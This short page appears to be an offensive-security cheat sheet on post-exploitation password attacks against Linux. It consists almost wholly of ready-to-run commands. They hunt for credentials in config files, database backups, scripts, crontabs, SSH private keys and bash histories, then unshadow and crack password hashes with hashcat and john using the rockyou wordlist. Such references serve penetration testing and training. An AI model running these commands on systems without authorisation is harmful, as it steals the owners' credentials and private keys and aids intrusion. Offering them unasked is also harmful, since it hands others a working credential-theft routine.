Linux Password Attack

Common Password Attack on Linux Machine

Config Files Search

for l in $(echo ".conf .config .cnf");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "lib\|fonts\|share\|core" ;done

Credentials in Configuration Files

for i in $(find / -name *.cnf 2>/dev/null | grep -v "doc\|lib");do echo -e "\nFile: " $i; grep "user\|password\|pass" $i 2>/dev/null | grep -v "\#";done

Database Backup Search

for l in $(echo ".sql .db .*db .db*");do echo -e "\nDB File extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc\|lib\|headers\|share\|man";done

Search Notes/txt Files

find /home/* -type f -name "*.txt" -o ! -name "*.*"

Search Scripts on Linux

for l in $(echo ".py .pyc .pl .go .jar .c .sh");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc\|lib\|headers\|share";done

Search Cronjob

cat /etc/crontab
ls -la /etc/cron.*/

Search SSH Private Key

grep -rnw "PRIVATE KEY" /home/* 2>/dev/null | grep ":1"

Bash History

tail -n5 /home/*/.bash*

Cracking Linux Credentials

# unshadow local creds
unshadow passwd.bak shadow.bak > unshadow.hash

# Perform Dictionary Attack
hashcat -m 1800 -a 0 unshadow.hash /usr/share/wordlists/rockyou.txt -o cracked_shadow
# or
john --wordlist=/usr/share/wordlists/rockyou.txt unshadow.hash

Tools

PreviousLinux Post Exploitation NextSimple PHP Webshell

Last updated 1 month ago